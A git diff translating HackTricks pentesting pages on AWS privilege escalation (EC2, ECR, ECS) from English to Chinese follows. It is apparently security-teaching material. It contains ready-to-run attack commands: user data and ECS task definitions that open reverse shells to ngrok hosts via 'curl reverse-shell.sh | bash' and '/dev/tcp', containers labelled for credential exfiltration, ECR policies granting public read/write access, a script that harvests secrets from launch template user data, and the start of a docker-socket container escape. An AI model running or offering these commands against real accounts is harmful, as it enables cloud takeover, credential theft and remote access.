permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**. +#### 提升权限到 ECS +通过这组权限,您还可以 **创建一个 EC2 实例并将其注册到 ECS 集群中**。这样,ECS **服务** 将在您有访问权限的 **EC2 实例** 内 **运行**,然后您可以渗透这些服务(docker 容器)并 **窃取其附加的 ECS 角色**。 ```bash aws ec2 run-instances \ - --image-id ami-07fde2ae86109a2af \ - --instance-type t2.micro \ - --iam-instance-profile \ - --count 1 --key-name pwned \ - --user-data "file:///tmp/asd.sh" +--image-id ami-07fde2ae86109a2af \ +--instance-type t2.micro \ +--iam-instance-profile \ +--count 1 --key-name pwned \ +--user-data "file:///tmp/asd.sh" # Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs) # The EC2 instance profile needs basic ECS access @@ -64,22 +59,20 @@ aws ec2 run-instances \ #!/bin/bash echo ECS_CLUSTER= >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config; ``` - -To learn how to **force ECS services to be run** in this new EC2 instance check: +要学习如何**强制在这个新的 EC2 实例中运行 ECS 服务**,请查看: {{#ref}} aws-ecs-privesc.md {{#endref}} -If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack. +如果您**无法创建新实例**但拥有权限 `ecs:RegisterContainerInstance`,您可能能够在集群中注册该实例并执行评论攻击。 -**Potential Impact:** Direct privesc to ECS roles attached to tasks. +**潜在影响:** 直接提升到附加到任务的 ECS 角色。 -### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`** - -Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\ -As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**. +### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`** +与之前的场景类似,拥有这些权限的攻击者可以**更改被攻陷实例的 IAM 角色**,以便窃取新的凭证。\ +由于实例配置文件只能有一个角色,如果实例配置文件**已经有一个角色**(常见情况),您还需要**`iam:RemoveRoleFromInstanceProfile`**。 ```bash # Removing role from instance profile aws iam remove-role-from-instance-profile --instance-profile-name --role-name @@ -87,60 +80,50 @@ aws iam remove-role-from-instance-profile --instance-profile-name --role- # Add role to instance profile aws iam add-role-to-instance-profile --instance-profile-name --role-name ``` +如果**实例配置文件有角色**且攻击者**无法移除它**,还有另一种变通方法。他可以**找到**一个**没有角色的实例配置文件**或**创建一个新的**(`iam:CreateInstanceProfile`),**将**该**角色**添加到该**实例配置文件**(如前所述),并**将实例配置文件**关联到一个被攻陷的**实例:** -If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:** - -- If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* - +- 如果实例**没有任何实例**配置文件(`ec2:AssociateIamInstanceProfile`)\* ```bash aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` - -**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). +**潜在影响:** 直接提升权限到不同的 EC2 角色(你需要已经攻陷一个 AWS EC2 实例,并且拥有一些额外的权限或特定的实例配置文件状态)。 ### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`) -With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it. - -- If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* +拥有这些权限后,可以更改与实例关联的实例配置文件,因此如果攻击者已经访问了一个实例,他将能够通过更改与之关联的配置文件来窃取更多实例配置文件角色的凭证。 +- 如果它 **有一个实例配置文件**,你可以 **移除** 实例配置文件 (`ec2:DisassociateIamInstanceProfile`) 并 **关联** 它 \* ```bash aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da aws ec2 disassociate-iam-instance-profile --association-id aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` - -- or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* - +- 或 **替换** 被攻陷实例的 **实例配置文件** (`ec2:ReplaceIamInstanceProfileAssociation`). \* ```` ```bash aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name= --association-id ``` ```` - -**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). +**潜在影响:** 直接提升权限到不同的 EC2 角色(您需要已经攻陷一个 AWS EC2 实例,并且拥有一些额外的权限或特定的实例配置文件状态)。 ### `ec2:RequestSpotInstances`,`iam:PassRole` -An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\ -Once the instance is run, he can **steal the IAM role**. - +拥有权限 **`ec2:RequestSpotInstances`和`iam:PassRole`** 的攻击者可以 **请求** 一个 **附加了 EC2 角色** 的 **Spot 实例** 和一个 **反向 shell** 在 **用户数据** 中。\ +一旦实例运行,他可以 **窃取 IAM 角色**。 ```bash REV=$(printf '#!/bin/bash curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash ' | base64) aws ec2 request-spot-instances \ - --instance-count 1 \ - --launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}" +--instance-count 1 \ +--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}" ``` - ### `ec2:ModifyInstanceAttribute` -An attacker with the **`ec2:ModifyInstanceAttribute`** can modify the instances attributes. Among them, he can **change the user data**, which implies that he can make the instance **run arbitrary data.** Which can be used to get a **rev shell to the EC2 instance**. - -Note that the attributes can only be **modified while the instance is stopped**, so the **permissions** **`ec2:StopInstances`** and **`ec2:StartInstances`**. +拥有 **`ec2:ModifyInstanceAttribute`** 的攻击者可以修改实例属性。其中,他可以 **更改用户数据**,这意味着他可以使实例 **运行任意数据**。这可以用来获取 **对 EC2 实例的反向 shell**。 +请注意,属性只能在 **实例停止时** **修改**,因此需要 **权限** **`ec2:StopInstances`** 和 **`ec2:StartInstances`**。 ```bash TEXT='Content-Type: multipart/mixed; boundary="//" MIME-Version: 1.0 @@ -171,125 +154,110 @@ printf $TEXT | base64 > "$TEXT_PATH" aws ec2 stop-instances --instance-ids $INSTANCE_ID aws ec2 modify-instance-attribute \ - --instance-id="$INSTANCE_ID" \ - --attribute userData \ - --value file://$TEXT_PATH +--instance-id="$INSTANCE_ID" \ +--attribute userData \ +--value file://$TEXT_PATH aws ec2 start-instances --instance-ids $INSTANCE_ID ``` - -**Potential Impact:** Direct privesc to any EC2 IAM Role attached to a created instance. +**潜在影响:** 直接提升权限到任何附加到创建实例的 EC2 IAM 角色。 ### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate` -An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell. - +具有权限 **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate` 和 `ec2:ModifyLaunchTemplate`** 的攻击者可以创建一个 **新的启动模板版本**,在 **用户数据** 中包含 **反向 shell** 和 **任何 EC2 IAM 角色**,更改默认版本,任何 **使用** 该 **启动模板** 的 **自动扩展组** 如果配置为使用 **最新** 或 **默认版本**,将会 **重新运行实例**,并执行反向 shell。 ```bash REV=$(printf '#!/bin/bash curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash ' | base64) aws ec2 create-launch-template-version \ - --launch-template-name bad_template \ - --launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}" +--launch-template-name bad_template \ +--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}" aws ec2 modify-launch-template \ - --launch-template-name bad_template \ - --default-version 2 +--launch-template-name bad_template \ +--default-version 2 ``` - -**Potential Impact:** Direct privesc to a different EC2 role. +**潜在影响:** 直接提升权限到不同的 EC2 角色。 ### `autoscaling:CreateLaunchConfiguration`, `autoscaling:CreateAutoScalingGroup`, `iam:PassRole` -An attacker with the permissions **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** can **create a Launch Configuration** with an **IAM Role** and a **rev shell** inside the **user data**, then **create an autoscaling group** from that config and wait for the rev shell to **steal the IAM Role**. - +拥有权限 **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** 的攻击者可以 **创建一个启动配置**,其中包含一个 **IAM 角色** 和一个 **反向 shell** 在 **用户数据** 中,然后 **从该配置创建一个自动扩展组**,并等待反向 shell **窃取 IAM 角色**。 ```bash aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \ - --launch-configuration-name bad_config \ - --image-id ami-0c1bc246476a5572b \ - --instance-type t3.micro \ - --iam-instance-profile EC2-CloudWatch-Agent-Role \ - --user-data "$REV" +--launch-configuration-name bad_config \ +--image-id ami-0c1bc246476a5572b \ +--instance-type t3.micro \ +--iam-instance-profile EC2-CloudWatch-Agent-Role \ +--user-data "$REV" aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \ - --auto-scaling-group-name bad_auto \ - --min-size 1 --max-size 1 \ - --launch-configuration-name bad_config \ - --desired-capacity 1 \ - --vpc-zone-identifier "subnet-e282f9b8" +--auto-scaling-group-name bad_auto \ +--min-size 1 --max-size 1 \ +--launch-configuration-name bad_config \ +--desired-capacity 1 \ +--vpc-zone-identifier "subnet-e282f9b8" ``` - -**Potential Impact:** Direct privesc to a different EC2 role. +**潜在影响:** 直接提升权限到不同的 EC2 角色。 ### `!autoscaling` -The set of permissions **`ec2:CreateLaunchTemplate`** and **`autoscaling:CreateAutoScalingGroup`** **aren't enough to escalate** privileges to an IAM role because in order to attach the role specified in the Launch Configuration or in the Launch Template **you need to permissions `iam:PassRole`and `ec2:RunInstances`** (which is a known privesc). +权限集 **`ec2:CreateLaunchTemplate`** 和 **`autoscaling:CreateAutoScalingGroup`** **不足以提升** 权限到 IAM 角色,因为要附加在启动配置或启动模板中指定的角色 **你需要权限 `iam:PassRole` 和 `ec2:RunInstances`** (这是一种已知的权限提升)。 ### `ec2-instance-connect:SendSSHPublicKey` -An attacker with the permission **`ec2-instance-connect:SendSSHPublicKey`** can add an ssh key to a user and use it to access it (if he has ssh access to the instance) or to escalate privileges. - +拥有权限 **`ec2-instance-connect:SendSSHPublicKey`** 的攻击者可以将 ssh 密钥添加到用户并使用它访问(如果他有对实例的 ssh 访问权限)或提升权限。 ```bash aws ec2-instance-connect send-ssh-public-key \ - --instance-id "$INSTANCE_ID" \ - --instance-os-user "ec2-user" \ - --ssh-public-key "file://$PUBK_PATH" +--instance-id "$INSTANCE_ID" \ +--instance-os-user "ec2-user" \ +--ssh-public-key "file://$PUBK_PATH" ``` - -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances. +**潜在影响:** 直接提升权限到附加到运行实例的 EC2 IAM 角色。 ### `ec2-instance-connect:SendSerialConsoleSSHPublicKey` -An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**. - -In order to connect to the serial port you also **need to know the username and password of a user** inside the machine. +拥有权限 **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** 的攻击者可以 **向串行连接添加 ssh 密钥**。如果串行未启用,攻击者需要权限 **`ec2:EnableSerialConsoleAccess` 来启用它**。 +为了连接到串行端口,您还 **需要知道机器内部用户的用户名和密码**。 ```bash aws ec2 enable-serial-console-access aws ec2-instance-connect send-serial-console-ssh-public-key \ - --instance-id "$INSTANCE_ID" \ - --serial-port 0 \ - --region "eu-west-1" \ - --ssh-public-key "file://$PUBK_PATH" +--instance-id "$INSTANCE_ID" \ +--serial-port 0 \ +--region "eu-west-1" \ +--ssh-public-key "file://$PUBK_PATH" ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws ``` +这种方式对提权并不太有用,因为你需要知道用户名和密码才能利用它。 -This way isn't that useful to privesc as you need to know a username and password to exploit it. - -**Potential Impact:** (Highly unprovable) Direct privesc to the EC2 IAM roles attached to running instances. +**潜在影响:**(高度不可证明)直接提权到附加到运行实例的 EC2 IAM 角色。 ### `describe-launch-templates`,`describe-launch-template-versions` -Since launch templates have versioning, an attacker with **`ec2:describe-launch-templates`** and **`ec2:describe-launch-template-versions`** permissions could exploit these to discover sensitive information, such as credentials present in user data. To accomplish this, the following script loops through all versions of the available launch templates: - +由于启动模板具有版本控制,拥有 **`ec2:describe-launch-templates`** 和 **`ec2:describe-launch-template-versions`** 权限的攻击者可以利用这些权限发现敏感信息,例如用户数据中存在的凭证。为此,以下脚本循环遍历所有可用启动模板的版本: ```bash for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId') do - echo "[*] Analyzing $i" - aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata - do - echo "VersionNumber: $version" - echo "$userdata" | base64 -d - echo - done | grep -iE "aws_|password|token|api" +echo "[*] Analyzing $i" +aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata +do +echo "VersionNumber: $version" +echo "$userdata" | base64 -d +echo +done | grep -iE "aws_|password|token|api" done ``` +在上述命令中,尽管我们指定了某些模式(`aws_|password|token|api`),但您可以使用不同的正则表达式来搜索其他类型的敏感信息。 -In the above commands, although we're specifying certain patterns (`aws_|password|token|api`), you can use a different regex to search for other types of sensitive information. +假设我们找到了 `aws_access_key_id` 和 `aws_secret_access_key`,我们可以使用这些凭据来认证到 AWS。 -Assuming we find `aws_access_key_id` and `aws_secret_access_key`, we can use these credentials to authenticate to AWS. +**潜在影响:** 直接提升到 IAM 用户的权限。 -**Potential Impact:** Direct privilege escalation to IAM user(s). - -## References +## 参考文献 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md index fd4686edb..e127fbd94 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md @@ -6,21 +6,21 @@ ### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage` -An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images. +拥有 **`ecr:GetAuthorizationToken`** 和 **`ecr:BatchGetImage`** 的攻击者可以登录 ECR 并下载镜像。 -For more info on how to download images: +有关如何下载镜像的更多信息: {{#ref}} ../aws-post-exploitation/aws-ecr-post-exploitation.md {{#endref}} -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. +**潜在影响:** 通过拦截流量中的敏感信息进行间接权限提升。 ### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart` -An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used. +拥有所有这些权限的攻击者 **可以登录 ECR 并上传镜像**。这对于提升到其他使用这些镜像的环境的权限非常有用。 -To learn how to upload a new image/update one, check: +要了解如何上传新镜像/更新镜像,请查看: {{#ref}} ../aws-services/aws-eks-enum.md @@ -28,85 +28,73 @@ To learn how to upload a new image/update one, check: ### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart` -Like the previous section, but for public repositories. +与前一部分相似,但适用于公共存储库。 ### `ecr:SetRepositoryPolicy` -An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\ -For example, in this example read access is given to everyone. - +拥有此权限的攻击者可以 **更改** **存储库** **策略** 以授予自己(甚至所有人) **读/写访问**。\ +例如,在这个例子中,读访问权限被授予给所有人。 ```bash aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json +--repository-name \ +--policy-text file://my-policy.json ``` - -Contents of `my-policy.json`: - +`my-policy.json` 的内容: ```json { - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "allow public pull", - "Effect": "Allow", - "Principal": "*", - "Action": [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] +"Version": "2008-10-17", +"Statement": [ +{ +"Sid": "allow public pull", +"Effect": "Allow", +"Principal": "*", +"Action": [ +"ecr:BatchCheckLayerAvailability", +"ecr:BatchGetImage", +"ecr:GetDownloadUrlForLayer" +] +} +] } ``` - ### `ecr-public:SetRepositoryPolicy` -Like the previoous section, but for public repositories.\ -An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges. - +与前一部分类似,但适用于公共存储库。\ +攻击者可以**修改ECR公共存储库的存储库策略**以授予未经授权的公共访问或提升他们的权限。 ```bash bashCopy code# Create a JSON file with the malicious public repository policy echo '{ - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "MaliciousPublicRepoPolicy", - "Effect": "Allow", - "Principal": "*", - "Action": [ - "ecr-public:GetDownloadUrlForLayer", - "ecr-public:BatchGetImage", - "ecr-public:BatchCheckLayerAvailability", - "ecr-public:PutImage", - "ecr-public:InitiateLayerUpload", - "ecr-public:UploadLayerPart", - "ecr-public:CompleteLayerUpload", - "ecr-public:DeleteRepositoryPolicy" - ] - } - ] +"Version": "2008-10-17", +"Statement": [ +{ +"Sid": "MaliciousPublicRepoPolicy", +"Effect": "Allow", +"Principal": "*", +"Action": [ +"ecr-public:GetDownloadUrlForLayer", +"ecr-public:BatchGetImage", +"ecr-public:BatchCheckLayerAvailability", +"ecr-public:PutImage", +"ecr-public:InitiateLayerUpload", +"ecr-public:UploadLayerPart", +"ecr-public:CompleteLayerUpload", +"ecr-public:DeleteRepositoryPolicy" +] +} +] }' > malicious_public_repo_policy.json # Apply the malicious public repository policy to the ECR Public repository aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json ``` - -**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images. +**潜在影响**:未经授权的公共访问ECR公共存储库,允许任何用户推送、拉取或删除镜像。 ### `ecr:PutRegistryPolicy` -An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**. - +拥有此权限的攻击者可以**更改** **注册表策略**,以授予自己、他的账户(甚至所有人)**读/写访问**。 ```bash aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json +--repository-name \ +--policy-text file://my-policy.json ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md index 4988270ab..c8bf700f1 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md @@ -4,7 +4,7 @@ ## ECS -More **info about ECS** in: +更多关于 **ECS** 的信息在: {{#ref}} ../aws-services/aws-ecs-enum.md @@ -12,185 +12,173 @@ More **info about ECS** in: ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask` -An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**. - +攻击者滥用 `iam:PassRole`、`ecs:RegisterTaskDefinition` 和 `ecs:RunTask` 权限可以 **生成一个新的任务定义**,其中包含一个 **恶意容器**,该容器窃取元数据凭证并 **运行它**。 ```bash # Generate task definition with rev shell aws ecs register-task-definition --family iam_exfiltration \ - --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ - --network-mode "awsvpc" \ - --cpu 256 --memory 512\ - --requires-compatibilities "[\"FARGATE\"]" \ - --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" +--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ +--network-mode "awsvpc" \ +--cpu 256 --memory 512\ +--requires-compatibilities "[\"FARGATE\"]" \ +--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" # Run task definition aws ecs run-task --task-definition iam_exfiltration \ - --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \ - --launch-type FARGATE \ - --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}" +--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \ +--launch-type FARGATE \ +--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}" # Delete task definition ## You need to remove all the versions (:1 is enough if you just created one) aws ecs deregister-task-definition --task-definition iam_exfiltration:1 ``` - -**Potential Impact:** Direct privesc to a different ECS role. +**潜在影响:** 直接提升权限到不同的ECS角色。 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask` -Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.\ -However, in this case, a container instance to run the malicious task definition need to be. - +就像在前面的例子中,攻击者滥用**`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`**权限在ECS中可以**生成一个新的任务定义**,其中包含一个**恶意容器**,该容器窃取元数据凭证并**运行它**。\ +然而,在这种情况下,需要有一个容器实例来运行恶意任务定义。 ```bash # Generate task definition with rev shell aws ecs register-task-definition --family iam_exfiltration \ - --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ - --network-mode "awsvpc" \ - --cpu 256 --memory 512\ - --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" +--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ +--network-mode "awsvpc" \ +--cpu 256 --memory 512\ +--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" aws ecs start-task --task-definition iam_exfiltration \ - --container-instances +--container-instances # Delete task definition ## You need to remove all the versions (:1 is enough if you just created one) aws ecs deregister-task-definition --task-definition iam_exfiltration:1 ``` - -**Potential Impact:** Direct privesc to any ECS role. +**潜在影响:** 直接提升到任何 ECS 角色。 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)` -Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.** - +就像在前面的例子中,攻击者滥用 **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** 或 **`ecs:CreateService`** 权限可以 **生成一个新的任务定义**,其中包含一个 **恶意容器**,该容器窃取元数据凭证并 **通过创建一个至少运行 1 个任务的新服务来运行它。** ```bash # Generate task definition with rev shell aws ecs register-task-definition --family iam_exfiltration \ - --task-role-arn "$ECS_ROLE_ARN" \ - --network-mode "awsvpc" \ - --cpu 256 --memory 512\ - --requires-compatibilities "[\"FARGATE\"]" \ - --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]" +--task-role-arn "$ECS_ROLE_ARN" \ +--network-mode "awsvpc" \ +--cpu 256 --memory 512\ +--requires-compatibilities "[\"FARGATE\"]" \ +--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]" # Run the task creating a service aws ecs create-service --service-name exfiltration \ - --task-definition iam_exfiltration \ - --desired-count 1 \ - --cluster "$CLUSTER_ARN" \ - --launch-type FARGATE \ - --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}" +--task-definition iam_exfiltration \ +--desired-count 1 \ +--cluster "$CLUSTER_ARN" \ +--launch-type FARGATE \ +--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}" # Run the task updating a service aws ecs update-service --cluster \ - --service \ - --task-definition +--service \ +--task-definition ``` - -**Potential Impact:** Direct privesc to any ECS role. +**潜在影响:** 直接提升到任何 ECS 角色。 ### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)` -Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like: - +实际上,仅凭这些权限,就可以使用覆盖来在具有任意角色的容器中执行任意命令,例如: ```bash aws ecs run-task \ - --task-definition "" \ - --overrides '{"taskRoleArn":"", "containerOverrides":[{"name":"","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \ - --cluster \ - --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}" +--task-definition "" \ +--overrides '{"taskRoleArn":"", "containerOverrides":[{"name":"","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \ +--cluster \ +--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}" ``` - -**Potential Impact:** Direct privesc to any ECS role. +**潜在影响:** 直接提升到任何 ECS 角色。 ### `ecs:RegisterTaskDefinition`, **`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`** -This scenario is like the previous ones but **without** the **`iam:PassRole`** permission.\ -This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\ -You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-privesc.md#privesc-to-node)). +这个场景与之前的类似,但**没有** **`iam:PassRole`** 权限。\ +这仍然很有趣,因为如果你可以运行任意容器,即使没有角色,你也可以**运行特权容器以逃逸**到节点并**窃取 EC2 IAM 角色**和**在节点上运行的其他 ECS 容器角色**。\ +你甚至可以**强制其他任务在你妥协的 EC2 实例内运行**以窃取它们的凭证(如在[**提升到节点部分**](aws-ecs-privesc.md#privesc-to-node)中讨论的)。 > [!WARNING] -> This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate. - +> 只有当**ECS 集群使用 EC2** 实例而不是 Fargate 时,这种攻击才是可能的。 ```bash printf '[ - { - "name":"exfil_creds", - "image":"python:latest", - "entryPoint":["sh", "-c"], - "command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""], - "mountPoints": [ - { - "readOnly": false, - "containerPath": "/var/run/docker.sock", - 